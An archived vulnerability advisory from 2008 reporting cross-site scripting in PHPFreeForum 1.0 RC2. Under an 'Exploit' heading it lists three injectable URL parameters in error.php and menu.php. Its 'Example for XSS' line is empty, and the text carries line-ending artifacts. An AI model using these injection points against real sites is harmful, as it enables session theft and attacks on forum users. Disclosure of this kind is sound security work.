TUCoPS :: Web :: PHP :: bx3277.htm

PHPFreeForum <= 1.0 RC2 Remote XSS Vulnerability
PHPFreeForum <= 1.0 RC2 Remote XSS Vulnerability
PHPFreeForum <= 1.0 RC2 Remote XSS Vulnerability



===========================================================0D
    PHPFreeForum <= 1.0 RC2 Remote XSS Vulnerability             =0D
===========================================================0D
=0D
AUTHOR : CWH Underground=0D
DATE   : 21 May 2008=0D
SITE : www.citec.us=0D 
=0D
=0D
#####################################################=0D
 APPLICATION : PHPFreeForum=0D
 VERSION     : 1.0 RC2=0D
VENDOR : http://downloads.sourceforge.net/phpfreeforum/ =0D 
#####################################################=0D
=0D
---Exploit---=0D
=0D
[-] http://[target]/[phpfreeforum_path]/html/error.php?message==0D 
[-] http://[target]/[phpfreeforum_path]/html/part/menu.php?nickname==0D 
[-] http://[target]/[phpfreeforum_path]/html/part/menu.php?randomid==0D 
=0D
Example for XSS : =0D
	=0D